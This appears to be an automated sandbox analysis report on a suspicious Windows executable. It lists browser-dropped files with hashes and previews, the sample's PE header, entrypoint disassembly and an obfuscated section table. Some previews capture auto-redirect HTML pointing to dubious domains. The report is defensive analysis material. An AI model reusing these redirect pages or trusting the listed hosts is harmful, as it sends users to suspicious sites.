                                                                                                                                                                      Preview: <html><head><meta name="referrer" content="no-referrer-when-downgrade"><title>Loading</title></head>.<body><script>location.href='https://mybetterdl.com/aS/feedclick?s=PmRMc57CnhYhj70e-I9ky5kfJerKhwxlfSMU3tyux_x5AGZrWUPSJmPzN2c9f2E7_vAN-6p8GpmDZG8TCuTZ6pDoEwlyap2kZsgzB4lH00ug8e5ExIzs-GByJkw_hnoLHWVUL2gXgUyatsBFMaSTc1RQ5RxkQPBqyyTn3ctXNy_0uSHRSxkmOy8VHMc85GIOT4jmse8Hco-FpMlb9RHx56VxjN2QtFN197vLrfkZ9qE509t5aRYfk0fTaZIGwGtVFx6Cjc1It8vKVodI2QoCnLeLuzBqxrSYHinyRIiR6SzTXaBf9PH6fc538M5WEvMvhjauUHGubj961r75KUjKtSXnHatHqEuiyuTMyWjRyjCKMGCurZS8_bcUa4tJgkiTyXdC5k_Q4CBuzEhgKlo_tO4ZCxjCqbxJk5Qzkw_MwwsEKwa-Bh_puw260HEYWHbHAxhhGdlJM-I_t1xxhVv3SQmb2uwb95RlGM7AqpOHVVF6EgPkt4a55MyZVnXuVkgrUl1akVOciihIlqaZoSoe2Ylzr70WFqgr6AhoabQSBzCjuJYNp4gwUYV0VWvRZajmUWO_Vxo8ML-hjUsrPH807AqUmDxuY4v8inEoo-y-qnyU06p2Uh3Pw9YdNYD58IK4CKCGcA-Uam9dcss-T-5Iub4J15H67wFZ2snzzWpWzEKC9XUORoe_dbnEgAhHx_n7Z4tVOYdW5lW6ruDPqaeHc0uzcTU9bgm_in-W2l5vorxPFmQaTFIcy4B5guOnMJ5yZHLQD576xYWbP03aM83dTwE3kMpnzCC1V5B-3hXd5pzfx17GSZUu2KHXImolykrm
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):178637
                                                                                                                                                                      Entropy (8bit):5.493248742265343
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:w4zYNQN8X5XXuC2Bi03vb4yeMNzbXAkHM4yuSpAIksLKIp7zHNHwje3EMv5s+:DYNQmSuhMz4AIksPhxHwC3EM++
                                                                                                                                                                      MD5:7AA1AB3412E4EF309043E4EACCCC9EB4
                                                                                                                                                                      SHA1:A7BD66883FABD4B0CBEB2A04FB23FCEA06225351
                                                                                                                                                                      SHA-256:F41266FB78957B17A1D9335EF0AE32C1E153F297952E421CD3703F3FFC66F339
                                                                                                                                                                      SHA-512:C0D37ACF120BD28EE69019B549FB7F5EC2651013B31C38739D23D61C83C76390A9989BBEE6D7D1389463DC9B1420909FE4CF1E534340CCCE85EF7F330EEE17F3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: this.gbar_=this.gbar_||{};(function(_){var window=this;.try{./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var pe;._.qe=function(a,b){b?a.setAttribute("role",b):a.removeAttribute("role")};_.M=function(a,b,c){Array.isArray(c)&&(c=c.join(" "));var d="aria-"+b;""===c||void 0==c?(pe||(pe={atomic:!1,autocomplete:"none",dropeffect:"none",haspopup:!1,live:"off",multiline:!1,multiselectable:!1,orientation:"vertical",readonly:!1,relevant:"additions text",required:!1,sort:"none",busy:!1,disabled:!1,hidden:!1,invalid:"false"}),c=pe,b in c?a.setAttribute(d,c[b]):a.removeAttribute(d)):a.setAttribute(d,c)};..}catch(e){_._DumpException(e)}.try{./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var se,te,ue;_.re=function(a,b){var c=a.length-b.length;return 0<=c&&a.indexOf(b,c)==c};se=function(a){return"string"==typeof a.className?a.className:a.getAttribute&&a.getAttribute("class")||""};te=function(a){return a.classList?a.classList
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\1G7O03DV.htm
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):356
                                                                                                                                                                      Entropy (8bit):4.811709820418917
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:qzxVkMRJWmNJax3XLxcKv8wF+B9hqecVAqV9qeSF0VqHV7bDRd7HTkIGII:kxVkMq/x3bxrX1eIVseSp1DRRQIGII
                                                                                                                                                                      MD5:7A7107EF5B0185F624703F0CE3161389
                                                                                                                                                                      SHA1:4E95838C06FBE825CD69FEAC3F28E91D6EA12D4F
                                                                                                                                                                      SHA-256:3750F0F41871B5F6A0669E0FAE857A2828AE2A187D8865D6E72F9929C4C00DFB
                                                                                                                                                                      SHA-512:D187740861254F65A115040FC5D0A3FFE9553917FC55EBD5989C6605726D749760144A4C208A89A4B655F2C48A7DAA6CFDDCA2F17C9A15F2DCF78BBA40D8EA16
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <html><head><meta http-equiv="refresh" content="5; url=http://ww9.menehleibe.com/"><title>Loading</title></head>.<body><form method="post" action="http://menehleibe.com/" target="_top" id="rf"><input type="hidden" name="ic" value="0"><input type="hidden" name="fb" value="true"/></form>.<script>document.getElementById("rf").submit()</script></body></html>
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\favicon[1].ico
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:MS Windows icon resource - 1 icon, 39x34, 32 bits/pixel
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5638
                                                                                                                                                                      Entropy (8bit):3.1461120884406477
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:fxe4e4e4e4e4e4f4f4f4f4f4f4f4fYfYfYfYfYeYeYCYCHHHH222A:fC
                                                                                                                                                                      MD5:DB884D3FED3F81D59E95E27707047C53
                                                                                                                                                                      SHA1:FD991A514B1284506BBBD229F4B067C3C7CC3CEB
                                                                                                                                                                      SHA-256:AAB68489204839B0F8E37065417C542695E914B959927D0E3AFD0D325E3787BC
                                                                                                                                                                      SHA-512:AD5FCAD5D60D89AFCE9ED1A62D05E88E71B664A53B552B428145B8CC2B8133BD8CC7439D615D26591CCC1A58EE5B29A16D4C215488ACF47ECFF0616A5F9B67ED
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\googlelogo_color_84x28dp[1].png
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:PNG image data, 84 x 28, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1785
                                                                                                                                                                      Entropy (8bit):7.86894160499635
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YEOjo9umWXnrXeUpcvNugkko+loEDBKUrSUI3YDZVLMDLDzPhs++s4S9k/vaJvGb:YdBSUmdkkoPeVSUI3kLL0PW++smpU3St
                                                                                                                                                                      MD5:B434F84DE33C4672C8D883A73C67E27C
                                                                                                                                                                      SHA1:15AA5241692EE565028B7CAC1418F6979C061FE1
                                                                                                                                                                      SHA-256:E3EE16B33C7AFC3464C263A9604A39A2E5EE81ED4DD68F56AE7C82D814FAF6BE
                                                                                                                                                                      SHA-512:D449A4F7B1D812D6FE251C87F96AD79953391722A7635799C8B7171DCA63985BB64E8F0F991501513793FA9A1DB88F7B8DCE7D59174CFA23D66FD5EEF1D01813
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\LM1X3BMT.htm
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:HTML document, UTF-8 Unicode text, with very long lines
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):158522
                                                                                                                                                                      Entropy (8bit):5.912822586462801
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:vosOtA0vKWzhq7gnsUP1jBUN7n3eKCQ6h0/KpG790Q/+vRWca5pv0KdcQfYWi9MT:Q8I9o37w1Qcm0KdcV+t
                                                                                                                                                                      MD5:7B408FDFF3226BE3BA01BB6056273800
                                                                                                                                                                      SHA1:DA6B2223F142BA9006418476708C5BDBE9114796
                                                                                                                                                                      SHA-256:D777C3C3AFF47F876E09CF5A0BF321BC6AC660EB9716FD950CF5277BE70FEE8D
                                                                                                                                                                      SHA-512:6961A69F76D3603B629C7C620A92B34A7269189E2F2D8ACFF83675AB3B6F0A78D5ECB1120A62CAF11D460AAB4257047DFF9D73C6C0ADB8FC162D1A3DBF4996E2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en-GB"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><link href="/manifest?pwa=webhp" crossorigin="use-credentials" rel="manifest"><title>Google</title><script nonce="sBDQvviEJYE6GoG6F/T2Gw==">(function(){window.google={kEI:'rKtAYY2rHY25kwWZrp3YAw',kEXPI:'31',kBL:'myGb'};google.sn='webhp';google.kHL='en-GB';})();(function(){.var f=this||self;var h,k=[];function l(a){for(var b;a&&(!a.getAttribute||!(b=a.getAttribute("eid")));)a=a.parentNode;return b||h}function m(a){for(var b=null;a&&(!a.getAttribute||!(b=a.getAttribute("leid")));)a=a.parentNode;return b}.function n(a,b,c,d,g){var e="";c||-1!==b.search("&ei=")||(e="&ei="+l(d),-1===b.search("&lei=")&&(d=m(d))&&(e+="&lei="+d));d="";!c&&f._cshid&&-1===b.search("&cshid=")&&"slh"!==a&&(d="&cshid="+f._cshid);c=c||"/"+(g||"gen_204")+"?atyp=i&ct="+a+
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\rs=AA2YrTt5urjnc1-as0vV15aU6T-f2ANE9g[1].css
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):235
                                                                                                                                                                      Entropy (8bit):5.054129687067898
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:EZwTcqcA2n6gt9VvKcZWbnRVIM6RoeSjIUVY/:EZfqcA26gAcZWfp6SVY/
                                                                                                                                                                      MD5:2B1D2EF81983F949B10A03ECE9D6B80C
                                                                                                                                                                      SHA1:C171F9C15235F09A1E0397A5F47DF4D712E91550
                                                                                                                                                                      SHA-256:B3B95456B6C2CD4D41EAEB10DC4291970EBB430F6E538A4DAF99F8369A1F7101
                                                                                                                                                                      SHA-512:439F8992A36C3BBD3E65318B236CA58D80FFC5DC100B3B31BF4ACD238D9021DBF46DDAB3D32670C477FC155BB1991B75D807E392923B3801B2FBBC9D02EAF1B4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: .gb_Qe{background:rgba(60,64,67,0.90);border-radius:4px;color:#ffffff;font:500 12px 'Roboto',arial,sans-serif;letter-spacing:.8px;line-height:16px;margin-top:4px;min-height:14px;padding:4px 8px;position:absolute;z-index:1000}sentinel{}
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\desktop_searchbox_sprites318_hr[1].png
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:PNG image data, 40 x 124, 8-bit colormap, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):779
                                                                                                                                                                      Entropy (8bit):7.376883204451902
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:36kAKAyMhGb5AHgK7+Wpf3sNQV34DVvN9sck:3vAKzVb5wuo3+1Jxk
                                                                                                                                                                      MD5:03E471800AFFD719388000AA2356DE1F
                                                                                                                                                                      SHA1:42E718342BD7F6EDF4899E161A77452DCBAC68F5
                                                                                                                                                                      SHA-256:BC23B3B207E8FA55B0C65A00F3FED491FA9EB5B1B39D159E7C4921BD331135EC
                                                                                                                                                                      SHA-512:BFA4329D35568F4F50AC2B05917AECB4AD3A4A69F8B7248E6D39CEA94F90C231B022C705ED1255F930271DB2BF5286F4B24BE6756A61E928B0D0723747D40081
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\googlelogo_color_272x92dp[1].png
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:PNG image data, 544 x 184, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):13504
                                                                                                                                                                      Entropy (8bit):7.934568436975546
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:gwSYjn2PH6WNa7cr7FliUuaJ78UOr0raQR:gOn2PaWNks7ziUuagJ0lR
                                                                                                                                                                      MD5:80FA4BCAB0351FDCCB69C66FB55DCD00
                                                                                                                                                                      SHA1:26F471F6EBE3B11557506F6AE96156E0A3852E5B
                                                                                                                                                                      SHA-256:262084257C2103702EF8A25705E3F8DBC1FA3823103AD7B954D54BDB77E6D89D
                                                                                                                                                                      SHA-512:B87A7554C5108400483EDAE585DAC672DEA6FE0DCD51CF5F73B4F9947649607F9C97B3B410FC0259BC2E0C60951DF2431323C1C7485A74291C23D999CFC32E17
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\index[1].htm
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):62
                                                                                                                                                                      Entropy (8bit):4.673133052883317
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:nmNjJMzVJu+1v3pY1sK3uqn:GMRJVxYr3uqn
                                                                                                                                                                      MD5:2A54A8CB5733591ED39A9B22AD0D31EC
                                                                                                                                                                      SHA1:D3FD4F9D291464480866127810E89DBE410CC41B
                                                                                                                                                                      SHA-256:06FA9277A7F41DB91096AF3B9087516502F99EC5C62209D8F20426621EE1909F
                                                                                                                                                                      SHA-512:C673009AF39B5D992217E1109134281A3F48AB316E5A1F515A5A7509D8693818FA68328EFC0816BE5956BA79F87D0BB72899EC83F8E02827BF27170B5DE1D830
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <meta http-equiv="refresh" content="0;URL= http://google.com">
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):89
                                                                                                                                                                      Entropy (8bit):4.484538240999641
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:oVXUtuCiPSdH8JOGXnEtuCiPSgun:o9UtugdHqEtugB
                                                                                                                                                                      MD5:FFC4B0966C043C7AC64A6D2462E63BF6
                                                                                                                                                                      SHA1:AADA1A11D642490C8D86635B12F8940F51AB64D4
                                                                                                                                                                      SHA-256:9F7112871FF782AC0CF220553CD17EB89965EE6F2BEAC59A692511A6D8718A2C
                                                                                                                                                                      SHA-512:523586F898A14A5731854B1BE50BA63EF7E506E81BE97AD8C5EB5B00A1F62FD1DCE6541959CEF49E7B5B7161787C2B1B31097CE552D323C7079F0F0B1257797F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: [2021/09/14 16:03:18.137] Latest deploy version: ..[2021/09/14 16:03:18.137] 11.211.2 ..
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF1C6E09CA4CF5EBDD.TMP
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):12933
                                                                                                                                                                      Entropy (8bit):0.40677040396038333
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:c9lLh9lLh9lIn9lIn9loSA9loSQ9lWSh1VI01iTF:kBqoIkaQbzo
                                                                                                                                                                      MD5:1DC22578617F1D3488CEB85FA0083C56
                                                                                                                                                                      SHA1:E0721DE9D8304D3BC7E550E148E247A426D0B681
                                                                                                                                                                      SHA-256:98B9D07C5D265759E63062020EAFB755B6FB9D5B22630810881C7DC532D94FFB
                                                                                                                                                                      SHA-512:67941D6A1BDFF429348115DB251445445C8BEB922759E2F28BC8E5DA8B9BF697B8F5039158C253867F1BBCCAA4FC8B2BCB7F7A517143CB6349CF5CD9F7DB1AAF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFFAD0E470126C2D77.TMP
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):51081
                                                                                                                                                                      Entropy (8bit):0.40980137997176297
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:kBqoxKAuvScS+6cGPcAQTTkOngHy85yg:kBqoxKAuqR+6cGPcAQ/kOngHy85yg
                                                                                                                                                                      MD5:ABA48F42A2D4459A35A1B6EF13FC8BFA
                                                                                                                                                                      SHA1:99CF9B826ADE51440E84043F1463A1CE4AA4EAA5
                                                                                                                                                                      SHA-256:92324F8734EE3288E2E31FE2331EF0C7899E4556B263C4AD2016AEB81C9EAE27
                                                                                                                                                                      SHA-512:B95C9CE22677F1C302B885F943A2DFFB738441D1F794E84E6355C5A44E9B748A3645344FE5950C5487D0959E10E6DF05B753A523D80614E52AA41A796F719E0A
                                                                                                                                                                      Malicious:false

                                                                                                                                                                      Static File Info

                                                                                                                                                                      General

                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Entropy (8bit):5.362341936277573
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                      File name:cd.exe
                                                                                                                                                                      File size:3922432
                                                                                                                                                                      MD5:cd02e745a08dd29cb6fda1761b2f4b6e
                                                                                                                                                                      SHA1:1a0dd3348bb0f856fff51f7e22364b0974fa1ad3
                                                                                                                                                                      SHA256:a4ff2e7dd35e8f7362739c3a578563458548ed5ffb30abe5ec6bf6f2c0de8eb7
                                                                                                                                                                      SHA512:f6c55fbb6ebf25f046f6d562d1c17d4503f8244f367f1dd64270ff8a9be56b6ed9c92dedd111359fa91d5ed8650773310f609c447baa0b1b4a9ee486143b2ca4
                                                                                                                                                                      SSDEEP:24576:BuuP1xP+9mrnv/6dh3Qh3OXuaq4gTeEu8Ct+M3VUXeN5DB:BtPHG6dZ4gTq8u+1Xq
                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@L..!"^.!"^.!"^.s.^.!"^.s.^.!"^.s.^.!"^.Y.^.!"^.!#^.!"^.Y.^.!"^.s.^.!"^.Y.^.!"^Rich.!"^........................PE..L.G.2..T...

                                                                                                                                                                      File Icon

                                                                                                                                                                      Icon Hash:00828e8e8686b000

                                                                                                                                                                      Static PE Info

                                                                                                                                                                      General

                                                                                                                                                                      Entrypoint:0x4036f7
                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                                                                      Time Stamp:0x54941332 [Fri Dec 19 11:59:46 2014 UTC]
                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                      File Version Major:6
                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                      Import Hash:ebc536e497c338b5abee5455de5bead2

                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                      Instruction
                                                                                                                                                                      call 00007F44F8AE2DE7h
                                                                                                                                                                      jmp 00007F44F8ADFF65h
                                                                                                                                                                      push 00000014h
                                                                                                                                                                      push 0042E750h
                                                                                                                                                                      call 00007F44F8AE1498h
                                                                                                                                                                      call 00007F44F8AE2FB8h
                                                                                                                                                                      movzx esi, ax
                                                                                                                                                                      push 00000002h
                                                                                                                                                                      call 00007F44F8AE2D7Ah
                                                                                                                                                                      pop ecx
                                                                                                                                                                      mov eax, 00005A4Dh
                                                                                                                                                                      cmp word ptr [00400000h], ax
                                                                                                                                                                      je 00007F44F8ADFF66h
                                                                                                                                                                      xor ebx, ebx
                                                                                                                                                                      jmp 00007F44F8ADFF95h
                                                                                                                                                                      mov eax, dword ptr [0040003Ch]
                                                                                                                                                                      cmp dword ptr [eax+00400000h], 00004550h
                                                                                                                                                                      jne 00007F44F8ADFF4Dh
                                                                                                                                                                      mov ecx, 0000010Bh
                                                                                                                                                                      cmp word ptr [eax+00400018h], cx
                                                                                                                                                                      jne 00007F44F8ADFF3Fh
                                                                                                                                                                      xor ebx, ebx
                                                                                                                                                                      cmp dword ptr [eax+00400074h], 0Eh
                                                                                                                                                                      jbe 00007F44F8ADFF6Bh
                                                                                                                                                                      cmp dword ptr [eax+004000E8h], ebx
                                                                                                                                                                      setne bl
                                                                                                                                                                      mov dword ptr [ebp-1Ch], ebx
                                                                                                                                                                      call 00007F44F8AE2539h
                                                                                                                                                                      test eax, eax
                                                                                                                                                                      jne 00007F44F8ADFF6Ah
                                                                                                                                                                      push 0000001Ch
                                                                                                                                                                      call 00007F44F8AE0041h
                                                                                                                                                                      pop ecx
                                                                                                                                                                      call 00007F44F8AE2495h
                                                                                                                                                                      test eax, eax
                                                                                                                                                                      jne 00007F44F8ADFF6Ah
                                                                                                                                                                      push 00000010h
                                                                                                                                                                      call 00007F44F8AE0030h
                                                                                                                                                                      pop ecx
                                                                                                                                                                      call 00007F44F8AE2DF3h
                                                                                                                                                                      and dword ptr [ebp-04h], 00000000h
                                                                                                                                                                      call 00007F44F8AE2523h
                                                                                                                                                                      test eax, eax
                                                                                                                                                                      jns 00007F44F8ADFF6Ah
                                                                                                                                                                      push 0000001Bh
                                                                                                                                                                      call 00007F44F8AE0016h
                                                                                                                                                                      pop ecx
                                                                                                                                                                      call dword ptr [0042602Ch]
                                                                                                                                                                      mov dword ptr [0043DFFCh], eax
                                                                                                                                                                      call 00007F44F8AE2E0Eh
                                                                                                                                                                      mov dword ptr [00434708h], eax
                                                                                                                                                                      call 00007F44F8AE27B1h
                                                                                                                                                                      test eax, eax
                                                                                                                                                                      jns 00007F44F8ADFF6Ah

                                                                                                                                                                      Rich Headers

                                                                                                                                                                      Programming Language:
                                                                                                                                                                      • [ C ] VS2013 build 21005
                                                                                                                                                                      • [LNK] VS2013 UPD3 build 30723
                                                                                                                                                                      • [C++] VS2013 build 21005
                                                                                                                                                                      • [ASM] VS2013 build 21005
                                                                                                                                                                      • [RES] VS2013 build 21005
                                                                                                                                                                      • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                      Data Directories

| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2ebb0 | 0x28 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3e000 | 0x1e0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x26150 | 0x38 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2df00 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x26000 | 0x104 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

                                                                                                                                                                      Sections

| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| .text | 0x1000 | 0x24b62 | 0x24c00 | False | 0.764774659864 | data | 6.93749374769 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
| .rdata | 0x26000 | 0x9182 | 0x9200 | False | 0.418049015411 | data | 4.70373356685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x30000 | 0xe000 | 0x4800 | False | 0.351616753472 | data | 3.54953091809 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x3e000 | 0x1e0 | 0x200 | False | 0.53125 | data | 4.71767883295 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| aZAqrnJo | 0x3f000 | 0x3819 | 0x3a00 | False | 0.371901939655 | data | 4.84589461101 | |
| BGOllIzc | 0x43000 | 0x4896 | 0x4a00 | False | 0.430796030405 | data | 4.44387669298 | |
| yQtoRARz | 0x48000 | 0xcbc0 | 0xcc00 | False | 0.348268995098 | data | 4.58448491924 | |
| dZLJZOuu | 0x55000 | 0x60359 | 0x60400 | False | 0.332028713474 | data | 4.87800746939 | |
| sdDGHbsk | 0xb6000 | 0x18385 | 0x18400 | False | 0.45299412049 | data | 5.29827826108 | |
| cQfsAIeK | 0xcf000 | 0x3eeae | 0x3f000 | False | 0.307458302331 | data | 5.32329417249 | |
| nJjdtQIB | 0x10e000 | 0xff4f | 0x10000 | False | 0.380676269531 | data | 4.75106212908 | |
| pcHOcQzM | 0x11e000 | 0x607b | 0x6200 | False | 0.496970663265 | data | 5.22222913281 | |
| wDcvvqlu | 0x125000 | 0xa629 | 0xa800 | False | 0.457333519345 | data | 5.40009906885 | |
| orXBiygL | 0x130000 | 0x28f16 | 0x29000 | False | 0.254954268293 | data | 4.87572841572 | |
| AiZKCfrK | 0x159000 | 0x3c8b | 0x3e00 | False | 0.276272681452 | data | 3.80209006598 | |
| myoGvTPf | 0x15d000 | 0x27a | 0x400 | False | 0.330078125 | data | 3.13663618281 | |
| AVTlzkED | 0x15e000 | 0x4162 | 0x4200 | False | 0.383877840909 | data | 4.89078285751 | |
| bzLENpIH | 0x163000 | 0x889a | 0x8a00 | False | 0.345957880435 | data | 4.43979752948 | |
| XcYnViEt | 0x16c000 | 0x59825 | 0x59a00 | False | 0.332216483612 | SysEx File - | 5.94377045532 | |
| mbKhPZXg | 0x1c6000 | 0x944 | 0xa00 | False | 0.384375 | data | 4.46068376218 | |
| lUpFJlcq | 0x1c7000 | 0x93 | 0x200 | False | 0.150390625 | data | 1.08603487889 | |
| yiDSdvAK | 0x1c8000 | 0x29c49 | 0x29e00 | False | 0.292000932836 | data | 6.01702880808 | |
| tWLpgAgw | 0x1f2000 | 0x1d3fb | 0x1d400 | False | 0.329794337607 | data | 4.73500817041 | |
| bTGdVUjl | 0x210000 | 0x1c142 | 0x1c200 | False | 0.322222222222 | data | 4.78096652478 | |
| ziIDaoXi | 0x22d000 | 0xbd62 | 0xbe00 | False | 0.364823190789 | data | 4.66321532752 | |
| LzawvTwX | 0x239000 | 0x21626 | 0x21800 | False | 0.1875 | data | 3.92488643682 | |
| LnIDzdzd | 0x25b000 | 0x8000 | 0x8000 | False | 0.382080078125 | data | 4.73126113063 | |
| wkCXpCGo | 0x263000 | 0x44a5 | 0x4600 | False | 0.351897321429 | data | 4.65104155262 | |
| nqpeKqho | 0x268000 | 0x828a | 0x8400 | False | 0.332682291667 | data | 4.39080198834 | |
| MRjgEOqy | 0x271000 | 0x1cca | 0x1e00 | False | 0.403776041667 | data | 5.16290821803 | |
| JcLmCXgA | 0x273000 | 0xb8dc | 0xba00 | False | 0.34627016129 | data | 4.63415459895 | |
